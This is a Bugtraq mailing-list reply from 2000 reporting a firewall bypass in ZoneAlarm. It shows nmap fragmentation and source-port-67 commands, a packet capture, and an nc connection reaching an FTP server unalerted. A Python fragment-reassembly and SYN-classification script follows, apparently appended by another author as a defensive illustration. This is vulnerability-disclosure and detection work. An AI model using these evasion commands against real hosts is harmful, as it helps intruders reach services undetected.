List: bugtraq
Subject: Re: ZoneAlarm
From: Max Vision <vision () WHITEHATS ! COM>
Date: 2000-04-26 9:50:33
On Mon, 24 Apr 2000, Alfred Huger wrote:
> >Additionally, using nmap's -f flag allows you to send traffic past
> >ZoneAlarm without any alerts.
>
> I set up a copy on a local machine here and while I found that source port
> scans from 67 slipped past the firewall -f seemed to be alerted on just
> fine. Can anyone else comment to this?
>
Hi Al,
I get the same results you did; ZoneAlarm 2.1.10 alerts on a fragmented
SYN scan, but does not make any noise when the source port is set to 67.
# nmap -sS -p 139 -v -f -P0 victim.example.com
Initiating SYN half-open stealth scan against victim.example.com
(23.23.23.23)
04/26-02:11:52.260668 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452 MF
Frag Offset: 0x0 Frag Size: 0x10
BC 49 00 8B 4D 4B C7 11 00 00 00 00 50 02 08 00 .I..MK......P...
04/26-02:11:52.260745 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452
Frag Offset: 0x2 Frag Size: 0x4
CA 49 00 00 .I..
ZoneAlarm reports
"The firewall has blocked Internet access to your computer (NetBIOS
Session) from attacker.example.com (TCP Port 3133)."
When I add the option for source port 67 (-g 67) ZoneAlarm does not alert
- however, the packets do not seem to be delivered either (no RST nor
SYN+ACK).
Now if you remove fragmentation from the picture, it looks like you can
use source porting (67 anyway) to circumvent the ZoneAlarm software.
# nc -p 67 victim.example.com 21
220 Serv-U FTP-Server v2.5e for WinSock ready...
quit
Without the bootp source port this connection is dropped and an alert is
generated.
Max
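As an added defensive illustration (my own code, not Max's and not part of ZoneAlarm), the script below reassembles the two fragments from the capture above, decodes the TCP header, and shows the check a host firewall should apply before granting any source-port exemption: BOOTP/DHCP is UDP, so a TCP SYN arriving from port 67 is never DHCP and deserves an alert rather than a free pass. The IP ID 777 packet is constructed here to stand in for the unfragmented SYN that `nc -p 67` sends to the FTP port.

```python
import struct

# Constructed sample: the two fragments captured in the post (IP ID 15452),
# re-typed from its hex dump, plus a third packet (IP ID 777, constructed)
# standing in for the unfragmented SYN that "nc -p 67 victim 21" produces.
# Tuple layout: (ip_id, frag_offset_in_8_byte_units, more_fragments, payload)
FRAGMENTS = [
    (15452, 0x0, True,  bytes.fromhex("BC49008B4D4BC7110000000050020800")),
    (15452, 0x2, False, bytes.fromhex("CA490000")),
    (777, 0x0, False, struct.pack("!HHIIHHHH", 67, 21, 0x1234, 0, 0x5002, 0x0800, 0, 0)),
]

def reassemble(frags):
    """Stitch fragments together per IP ID; refuse gaps, overlaps and missing tails."""
    by_id = {}
    for ip_id, offset, mf, payload in frags:
        by_id.setdefault(ip_id, []).append((offset * 8, mf, payload))
    datagrams = {}
    for ip_id, pieces in by_id.items():
        buf = bytearray()
        for start, mf, payload in sorted(pieces):
            if start != len(buf):  # gap or overlap: do not guess, reject
                raise ValueError("IP ID %d: non-contiguous fragment at %d" % (ip_id, start))
            buf += payload
        if mf:  # last piece in offset order still had More Fragments set
            raise ValueError("IP ID %d: final fragment missing" % ip_id)
        datagrams[ip_id] = bytes(buf)
    return datagrams

def parse_tcp(segment):
    """Decode the fields of the fixed TCP header needed to judge a SYN probe."""
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", segment[:16])
    return {"sport": sport, "dport": dport, "seq": seq, "window": window,
            "syn": bool(off_flags & 0x02), "ack": bool(off_flags & 0x10)}

def classify(segment):
    """Return the verdict a host firewall should reach for an inbound segment."""
    t = parse_tcp(segment)
    if not (t["syn"] and not t["ack"]):
        return "pass"  # only new-connection attempts are judged here
    if t["sport"] == 67:
        # BOOTP/DHCP runs over UDP, so a TCP SYN from port 67 is never DHCP:
        # it earns an alert, not the exemption the post shows ZoneAlarm granting.
        return "alert: bogus BOOTP source port to TCP/%d" % t["dport"]
    return "alert: inbound SYN to TCP/%d" % t["dport"]

if __name__ == "__main__":
    for ip_id, datagram in reassemble(FRAGMENTS).items():
        print(ip_id, classify(datagram))
```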